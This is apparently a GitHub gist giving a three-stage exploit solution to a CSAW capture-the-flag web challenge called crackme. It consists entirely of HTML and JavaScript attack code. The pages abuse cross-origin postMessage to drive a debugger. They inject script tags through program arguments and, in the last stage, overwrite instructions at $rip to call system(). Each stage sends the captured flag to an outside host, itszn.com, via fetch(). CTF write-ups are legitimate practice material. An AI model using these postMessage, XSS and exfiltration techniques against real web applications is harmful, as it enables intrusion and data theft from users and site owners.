Skip to content

Instantly share code, notes, and snippets.

@itszn
Last active November 8, 2019 17:41
Show Gist options
  • Save itszn/0e5d4e70bf8dbab55c19b650120aa37b to your computer and use it in GitHub Desktop.
Save itszn/0e5d4e70bf8dbab55c19b650120aa37b to your computer and use it in GitHub Desktop.
Easiest Crackme Solution
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 1) {
fetch("http://itszn.com/?flag="+msg.output);
}
});
a.onload = function() {
a.contentWindow.postMessage({type:'start',args:['web2hard'], id: i++, from:'page'},'*');
}
</script>
<iframe src="http://crackme.web.chal.csaw.io" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
a.contentWindow.postMessage({type:'breakpoint',addr:'main+79', from:'page', id: i++},'*');
} else if (msg.id == 1) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 2) {
a.contentWindow.postMessage({type:'open_debugger', from:'page', id: i++},'*');
}
});
a.onload = function() {
a.contentWindow.postMessage({type:'start',args:['<script>fetch(`/flag2.txt`).then(x=>x.text()).then(x=>fetch(`http://itszn.com/?${x}`))</'+'script>'], id: i++, from:'page'},'*');
}
</script>
<iframe src="http://crackme.web.chal.csaw.io" id="a"></iframe>
<script>
let i=0;
let uid = null;
let pl = `
(function(){
// Only run once
if (window.ran) return;
send_message_to_backend({type:'flavor',flavor:'follow-fork-mode parent'}).then(x=>{
return send_message_to_backend({
type:'flavor',
flavor:'*((long*)$rip)=0xb848',
uid:uid});
}).then(x=>{
return send_message_to_backend({
type:'flavor',
flavor:'*((long*)($rip+2))=system',
uid:uid});
}).then(x=>{
return send_message_to_backend({
type:'flavor',
flavor:'*((long*)($rip+10))=0xd0ff',
uid:uid});
}).then(x=>{
return send_message_to_backend({
type:'continue',
uid:uid});
}).then(msg=>{
console.log(msg)
fetch('http://itszn.com/?flag='+msg.output);
});
})()
`;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
uid = msg.uid;
a.contentWindow.postMessage({type:'breakpoint',addr:'main+79', from:'page', id: i++},'*');
} else if (msg.id == 1) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 2) {
a.contentWindow.postMessage({
type:'open_debugger',
from:'page',
uid:uid + '#'+btoa(pl),
id: i++},'*');
}
});
a.onload = function() {
a.contentWindow.postMessage({type:'start',args:['/flag3.exe #<script>eval(atob(location.hash.slice(1)))</'+'script>'], id: i++, from:'page'},'*');
}
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment